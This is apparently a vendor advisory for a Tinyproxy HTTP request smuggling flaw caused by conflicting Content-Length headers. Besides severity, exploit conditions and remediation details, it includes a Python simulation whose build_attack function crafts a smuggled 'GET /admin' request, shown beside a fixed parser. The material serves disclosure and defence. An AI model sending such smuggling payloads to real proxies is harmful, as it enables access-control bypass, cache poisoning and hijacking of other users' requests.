CVE-2026-54388: Tinyproxy - HTTP Request Smuggling via Duplicate Content-Length Headers
Tinyproxy through 1.11.3, fixed in commit 364cdb6, fails to reject requests containing multiple Content-Length headers with differing values, forwarding all duplicate headers to the backend while using the first value to determine how many request body bytes to consume. Remote attackers can desynchronize the proxy and backend parser state, allowing injection of arbitrary HTTP requests to the backend to enable cache poisoning, access control bypass, and request hijacking.
Metrics
- CVSS v4.0
- 9.3
- Severity
- CRITICAL
- Fixed in
- 364cdb67e0ea00a8e4a7037e2693e0711e816adb
- Affected Products
- 1
HarborGuard Analysis
Synopsis
HTTP request smuggling in Tinyproxy allows a remote, unauthenticated attacker to desynchronize the proxy and backend HTTP parser state by sending requests with multiple conflicting Content-Length headers: the proxy frames the request body by the first value but relays every Content-Length header unchanged, so a backend that frames by a different value treats part of the attacker's body as a separate request. The vulnerability is reachable over the network with no authentication required. Successful exploitation enables cache poisoning, access control bypass, and arbitrary HTTP request injection to the backend server. A patched-image rebuild at commit 364cdb67e0ea00a8e4a7037e2693e0711e816adb is available on HarborGuard for environments running an affected version.
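The desync described above, as an added example that is not Tinyproxy's code or HarborGuard's. It models a front end that frames the body by the first Content-Length and relays all headers verbatim (the advisory's description of Tinyproxy 1.11.3 and earlier), beside a fixed variant that rejects conflicting values as RFC 9112 section 6.3 requires. The last-value back end that reuses its connection, the host names, and the request bytes are all constructed assumptions chosen to make the split visible; the example also shows the comma-separated form of a duplicated Content-Length, which the advisory does not mention.

```python
"""Constructed model of a duplicate Content-Length desync (not Tinyproxy's code).

Assumed, for the demo only:
  - the proxy frames the body by the FIRST Content-Length and relays every header;
  - the back end frames by the LAST value and keeps parsing on the same connection;
  - every request byte and host name below is made up for this example.
"""
from typing import List, Tuple

CRLF = b"\r\n"


def parse_head(raw: bytes) -> Tuple[bytes, List[Tuple[bytes, bytes]], bytes]:
    """Split one raw HTTP/1.1 request into (request line, [(name, value)], bytes after the blank line)."""
    head, sep, rest = raw.partition(CRLF + CRLF)
    if not sep:
        raise ValueError("incomplete header block")
    lines = head.split(CRLF)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, rest


def content_lengths(headers: List[Tuple[bytes, bytes]]) -> List[int]:
    """Every Content-Length value in wire order; a comma-separated list counts as several values."""
    values: List[int] = []
    for name, value in headers:
        if name == b"content-length":
            values.extend(int(v.strip()) for v in value.split(b",") if v.strip())
    return values


def frame_body_length(headers: List[Tuple[bytes, bytes]], policy: str) -> int:
    """Lenient framing: body length taken from the first or last value, 0 when the header is absent."""
    values = content_lengths(headers)
    if not values:
        return 0
    return values[0] if policy == "first" else values[-1]


def strict_body_length(headers: List[Tuple[bytes, bytes]]) -> int:
    """RFC 9112 section 6.3 framing: duplicates are tolerated only when every value is identical;
    differing values make the message invalid and the proxy must answer 400 and close."""
    values = content_lengths(headers)
    if len(set(values)) > 1:
        raise ValueError(f"conflicting Content-Length values {values}")
    return values[0] if values else 0


def split_stream(stream: bytes, policy: str) -> List[bytes]:
    """Cut a byte stream into the requests a parser using the given framing policy would see."""
    messages = []
    while stream:
        _, headers, rest = parse_head(stream)
        n = frame_body_length(headers, policy)
        head_len = len(stream) - len(rest)
        messages.append(stream[:head_len + n])
        stream = stream[head_len + n:]
    return messages


def build_attack() -> bytes:
    """One client request whose body carries a second, smuggled request (constructed bytes)."""
    smuggled = b"GET /admin HTTP/1.1" + CRLF + b"Host: backend.internal" + CRLF + CRLF
    visible_body = b"q=abc"
    body = visible_body + smuggled
    return (b"POST /search HTTP/1.1" + CRLF
            + b"Host: backend.internal" + CRLF
            + b"Content-Length: %d" % len(body) + CRLF           # first value: whole body
            + b"Content-Length: %d" % len(visible_body) + CRLF   # last value: visible part only
            + CRLF + body)


def vulnerable_proxy(client_stream: bytes) -> bytes:
    """Vulnerable behaviour: frame by the first value, relay headers and body unchanged."""
    return b"".join(split_stream(client_stream, "first"))


def fixed_proxy(client_stream: bytes) -> bytes:
    """Fixed behaviour: refuse conflicting values before any byte reaches the back end."""
    _, headers, _ = parse_head(client_stream)
    strict_body_length(headers)  # raises ValueError on conflict
    return client_stream


def fixed_proxy_accepts(client_stream: bytes) -> bool:
    try:
        fixed_proxy(client_stream)
        return True
    except ValueError:
        return False


def backend_request_lines(wire: bytes) -> List[bytes]:
    """Request lines the last-value back end parses out of what the proxy forwarded."""
    return [m.split(CRLF, 1)[0] for m in split_stream(wire, "last")]


if __name__ == "__main__":
    attack = build_attack()
    print("proxy forwarded", len(split_stream(attack, "first")), "message(s)")
    print("back end parsed:", backend_request_lines(vulnerable_proxy(attack)))
    print("fixed proxy accepts:", fixed_proxy_accepts(attack))
```

Run stand-alone, the vulnerable path forwards one message and the back end parses two request lines, the second being the smuggled `GET /admin`; the fixed path rejects the same bytes. With the two values swapped (first smaller than last) the assumed back end instead waits for body bytes the proxy never sends, and whatever the proxy writes next on that connection is swallowed into the attacker's body, which is the request-hijack case listed under Blast Radius.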
HarborGuard Coverage
- Detection
- Available
Detection of CVE-2026-54388 is available across every HarborGuard environment, with the CVE matched against customer images (including custom-built images) within minutes of ingestion from upstream advisory feeds. Any image carrying Tinyproxy at version 1.11.3 or earlier is flagged automatically in both registry scans and CI/CD pipeline checks.
- Triage
- Available
Triage is available with the full CVSS v4.0 score of 9.3 (Critical) applied to each matched image, weighted further by any per-environment compliance policy the customer has configured. Findings are routed to the team inbox or ticketing integration designated in each customer organization's routing rules.
- Remediation
- Available
A patched-image rebuild pinned to commit 364cdb67e0ea00a8e4a7037e2693e0711e816adb becomes available on HarborGuard for any environment where an affected image is detected. For customers who opt into auto-remediation, HarborGuard triggers the rebuild, runs a regression test suite against the new image, and opens a pull request against affected workloads automatically.
Exploit Conditions
- Network reachability: Required
The attacker must reach the Tinyproxy service over the network; the vulnerability is exposed to any client that can send HTTP requests to the proxy (AV:N).
- Authentication: Not required
No credentials or session are needed; the malicious request can be sent by any unauthenticated HTTP client (PR:N).
- Victim interaction: Not required
Exploitation is fully attacker-driven and requires no action from a legitimate user or administrator (UI:N).
- Attack complexity: Low
No race conditions or special environmental state are required to trigger the header smuggling (AC:L, AT:N). The desync itself depends on the backend framing the body by a different Content-Length value than the first one Tinyproxy uses, so the attacker may need to tune the header order to the backend's parser.
Blast Radius
- An attacker reads responses intended for other users by hijacking in-flight backend requests, exposing session tokens or sensitive application data (VC:H).
- An attacker injects arbitrary HTTP requests to the backend, modifying persisted application state or poisoning shared caches to serve malicious content to subsequent users (VI:H).
- Access control rules enforced by Tinyproxy or the backend can be bypassed entirely, reaching endpoints or resources that should be restricted to privileged users.
- Cache poisoning allows the attacker to plant crafted responses that are served to any user whose request hits the poisoned cache entry, amplifying impact beyond the initial exploit.
How HarborGuard Handles This
Available on HarborGuard: images containing Tinyproxy at or below version 1.11.3 are matched against CVE-2026-54388 within minutes of advisory publication, including images built internally by customers. Where compliance policy permits, a rebuild against commit 364cdb67e0ea00a8e4a7037e2693e0711e816adb is queued immediately. For customers with auto-remediation enabled, HarborGuard produces the rebuilt image, runs a regression test pass, and opens a pull request against affected workloads; for Critical-severity findings the median time from CVE publication to merged patch PR is around 90 minutes in environments with auto-remediation active. For customers who manage patching manually, the HarborGuard finding card links directly to the fix commit and marks the image as blocked from promotion until the fix version is present. Given the unauthenticated, network-reachable nature of this vulnerability, teams that cannot immediately rebuild are advised to use HarborGuard network-policy isolation controls to restrict inbound access to the Tinyproxy port to trusted source ranges while the patch is applied.
- tinyproxy / tinyproxy: ≤ 1.11.3, fixed in 364cdb67e0ea00a8e4a7037e2693e0711e816adb
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N